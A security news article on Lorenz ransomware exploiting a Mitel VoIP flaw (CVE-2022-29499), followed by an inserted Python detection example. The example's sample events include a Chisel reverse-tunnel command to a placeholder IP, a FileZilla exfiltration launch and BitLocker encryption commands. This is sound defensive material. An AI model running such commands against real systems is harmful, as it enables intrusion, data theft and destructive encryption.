A now-patched significant security hole in Mitel MiVoice Connect has been exploited by the Lorenz ransomware operation, which used it to gain access to target environments for subsequent destructive actions.

Researchers from cybersecurity company Arctic Wolf stated in a report released this week that the “first malicious activity emanated from a Mitel appliance located on the network perimeter.”

“Lorenz utilized Chisel as a tunneling tool to pivot into the environment after exploiting CVE-2022-29499. This is a remote code execution vulnerability affecting the Mitel Service Appliance component of MiVoice Connect.”

Since at least February 2021, Lorenz, like many other ransomware gangs, has targeted small and medium-sized businesses (SMBs) in the United States, and to a lesser extent in China and Mexico. Lorenz is notorious for double extortion by exfiltrating data before encrypting systems.

Cybereason described Lorenz as an “ever-evolving ransomware” and said it was “believed to be a rebranding of the .sZ40 malware found in October 2020”.

The weaponization of Mitel VoIP appliances for ransomware attacks is consistent with recent research from CrowdStrike, which revealed details of a ransomware intrusion attempt that used the same technique to obtain remote code execution against an undisclosed target.

The Issues

With approximately 20,000 internet-exposed devices online, according to security expert Kevin Beaumont, Mitel VoIP solutions are also a lucrative entry point that is susceptible to malicious attacks.

In one Lorenz ransomware attack that Arctic Wolf examined, the threat actors used the remote code execution bug to create a reverse shell and then download the Chisel proxy tool.

This suggests that the threat actors either obtained initial access themselves or did so with the assistance of an initial access broker (IAB) in possession of a CVE-2022-29499 exploit.

It is also noteworthy that the Lorenz gang waited almost a month after gaining initial access before performing post-exploitation activities such as establishing persistence via a web shell, harvesting credentials, network reconnaissance, privilege escalation, and lateral movement.

The attack ultimately resulted in data exfiltration using FileZilla, after which the hosts were encrypted using Microsoft’s BitLocker service, which highlights the ongoing abuse of living-off-the-land binaries (LOLBINs) by adversaries.
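As an added example (not code from the article or from Arctic Wolf), the following Python rules scan constructed process-creation events for the three tools named in this chain: Chisel with a reverse forward, FileZilla launched from a shell, and BitLocker switched on from the command line. The `chisel client ... R:` syntax, `manage-bde -on` and `Enable-BitLocker` are real invocations; the hostnames, paths and the 203.0.113.10 address are invented.

```python
"""Toy rules for the Lorenz chain above: Chisel, FileZilla and BitLocker-as-LOLBIN."""
import re
from typing import Iterable, List, Optional, Tuple

# Constructed sample process-creation events: (host, parent_image, image, command_line).
SAMPLE_EVENTS = [
    ("mitel-appl", "sh", "/tmp/chisel",
     "/tmp/chisel client 203.0.113.10:8080 R:socks"),
    ("ws-17", "explorer.exe", r"C:\Program Files\FileZilla FTP Client\filezilla.exe",
     "filezilla.exe"),
    ("srv-01", "cmd.exe", r"C:\Program Files\FileZilla FTP Client\filezilla.exe",
     "filezilla.exe --site=0/exfil"),
    ("srv-01", "cmd.exe", r"C:\Windows\System32\manage-bde.exe",
     "manage-bde -on D: -RecoveryPassword -UsedSpaceOnly"),
    ("srv-02", "powershell.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -c Enable-BitLocker -MountPoint C: -RecoveryPasswordProtector"),
    ("ws-03", "explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]
INTERACTIVE_PARENTS = {"explorer.exe"}  # parents expected for a user-launched GUI app


def _base(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def classify(event: Tuple[str, str, str, str]) -> Optional[str]:
    """Return a rule name if the event matches one of the report's TTPs, else None."""
    _host, parent, image, cmd = event
    img, par, low = _base(image), _base(parent), cmd.lower()
    # Chisel: 'client' plus an R: argument is a reverse port-forward (the pivot).
    if "chisel" in img or (" client " in low and re.search(r"\bR:", cmd)):
        return "chisel_tunnel"
    # BitLocker turned on from a shell rather than through policy or the GUI.
    if (img == "manage-bde.exe" and re.search(r"\s-(on|lock)\b", low)) \
            or "enable-bitlocker" in low:
        return "bitlocker_lolbin"
    # FileZilla spawned by a shell instead of an interactive session.
    if img == "filezilla.exe" and par not in INTERACTIVE_PARENTS:
        return "filezilla_from_shell"
    return None


def detect(events: Iterable[Tuple[str, str, str, str]]) -> List[Tuple[str, str]]:
    """Return (host, rule) for every event that matches a rule, in input order."""
    return [(ev[0], rule) for ev in events if (rule := classify(ev))]


if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```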

The researchers noted that “monitoring simply important assets is not enough for enterprises,” adding that “security teams should monitor all externally facing devices, including VoIP and IoT devices, for potential malicious activity.”

Threat actors are starting to target less well-known or less closely watched assets to evade detection.